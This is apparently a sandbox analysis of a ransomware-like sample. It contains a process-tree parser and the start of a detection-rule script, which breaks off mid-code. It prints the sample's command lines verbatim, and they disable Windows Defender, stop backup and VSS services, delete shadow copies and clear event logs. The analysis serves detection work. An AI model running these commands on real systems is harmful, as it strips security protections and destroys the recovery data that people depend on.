Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2632 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3796 wrote to memory of 3864 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3796 wrote to memory of 3864 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3796 wrote to memory of 3864 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3360 wrote to memory of 512 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3360 wrote to memory of 512 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3360 wrote to memory of 512 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 800 wrote to memory of 2220 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 800 wrote to memory of 2220 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 800 wrote to memory of 2220 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2812 wrote to memory of 788 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2812 wrote to memory of 788 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2812 wrote to memory of 788 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3728 wrote to memory of 1460 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3728 wrote to memory of 1460 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3728 wrote to memory of 1460 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3516 wrote to memory of 480 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3516 wrote to memory of 480 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3516 wrote to memory of 480 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2824 wrote to memory of 1244 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2824 wrote to memory of 1244 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2824 wrote to memory of 1244 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1276 wrote to memory of 1236 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1276 wrote to memory of 1236 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1276 wrote to memory of 1236 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2552 wrote to memory of 3692 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2552 wrote to memory of 3692 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2552 wrote to memory of 3692 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\sc.exe
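
Every parent/child pair in the table above appears three times because a WriteProcessMemory hook sees CreateProcess as several writes into the new process before its first thread runs, so the table doubles as a spawn log: the sample (PID 2632) launches net.exe, which launches net1.exe, and so on. The Python below is an added example, not part of the report or of the sandbox's tooling; it parses a constructed excerpt of that table (the sample's hash filename shortened to the placeholder sample.exe) into a deduplicated process tree and counts what was spawned.

```python
import ntpath
import re
from collections import Counter, defaultdict

# Constructed excerpt of the "Suspicious use of WriteProcessMemory" table.
# Each CreateProcess shows up as three writes into the child, so one spawn
# is one unique (parent pid, child pid) pair. "sample.exe" stands in for the
# sample's long hash filename.
SAMPLE_ROWS = r"""
PID 2632 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\SysWOW64\net.exe
PID 3796 wrote to memory of 3864 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3796 wrote to memory of 3864 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3796 wrote to memory of 3864 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\SysWOW64\net.exe
PID 3360 wrote to memory of 512 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3360 wrote to memory of 512 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3360 wrote to memory of 512 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\SysWOW64\sc.exe
PID 2632 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\SysWOW64\sc.exe
"""

ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+)$")
# Two Windows paths separated by one space; paths may themselves contain
# spaces (C:\Program Files\...), so split on the next "drive letter:\".
PATH_RE = re.compile(r"[A-Za-z]:\\.*?(?= [A-Za-z]:\\|$)")


def parse_rows(text):
    """Return unique (ppid, pid, parent_path, child_path) edges, first-seen order."""
    edges, seen = [], set()
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        ppid, pid, rest = int(m.group(1)), int(m.group(2)), m.group(3)
        paths = PATH_RE.findall(rest)
        if len(paths) != 2 or (ppid, pid) in seen:
            continue  # malformed row, or a repeat of an already-seen spawn
        seen.add((ppid, pid))
        edges.append((ppid, pid, paths[0], paths[1]))
    return edges


def build_tree(edges):
    """Map pid -> image path and parent pid -> ordered list of child pids."""
    names, children = {}, defaultdict(list)
    for ppid, pid, ppath, cpath in edges:
        names.setdefault(ppid, ppath)
        names[pid] = cpath
        children[ppid].append(pid)
    return names, children


def roots(edges):
    """Pids that only ever appear as parents: the top of each spawn chain."""
    return sorted({e[0] for e in edges} - {e[1] for e in edges})


def render(names, children, pid, depth=0):
    """Indented text tree rooted at pid, one line per process."""
    lines = [f"{'  ' * depth}{pid} {ntpath.basename(names[pid])}"]
    for kid in children.get(pid, []):
        lines.extend(render(names, children, kid, depth + 1))
    return lines


def spawn_counts(edges):
    """How many times each child image was launched (after deduplication)."""
    return Counter(ntpath.basename(e[3]).lower() for e in edges)


if __name__ == "__main__":
    edges = parse_rows(SAMPLE_ROWS)
    names, children = build_tree(edges)
    for root in roots(edges):
        print("\n".join(render(names, children, root)))
    print(dict(spawn_counts(edges)))
```

Run against the full table, the tree makes the fan-out obvious: one parent, a net.exe/net1.exe pair per service stopped, then a run of sc.exe children. The deduplication matters when you score the sample; counting the raw rows would triple the number of LOLBin launches.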

Processes

C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe

"C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "vmicvss" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UnistoreSvc_1323b" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_1323b" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UnistoreSvc_1323b" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true
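
Read top to bottom, the command lines above are the whole pre-encryption playbook: stop and then disable the backup, VSS and security services, turn Defender off both by policy key and by service start type, disable its scheduled tasks and ETW autologgers, strip its definitions, delete shadow copies, and clear the System, Security and Application logs. None of these binaries is malicious on its own, which is why detection has to key on the command line and on co-occurrence rather than on the image name. The Python below is an added example, not the report's or any vendor's detection content: it encodes those patterns as regex rules (the ATT&CK technique IDs are my own annotation, not the report's mapping), runs them over a constructed list of process command lines taken from this section plus benign look-alikes, and escalates only when several distinct techniques appear together.

```python
import re
from collections import Counter

# Services this sample stops/disables: backup, VSS, credential and security services.
WATCHED_SERVICES = r"(?:VSS|wbengine|SDRSVC|vmicvss|SamSs|SstpSvc|UI0Detect|WebClient|UnistoreSvc\w*)"
DEFENDER_SERVICES = r"(?:WinDefend|WdBoot|WdFilter|WdNisDrv|WdNisSvc|SecurityHealthService)"

# (rule name, ATT&CK technique as annotated by this example, regex)
RULES = [
    ("service_stop", "T1489",
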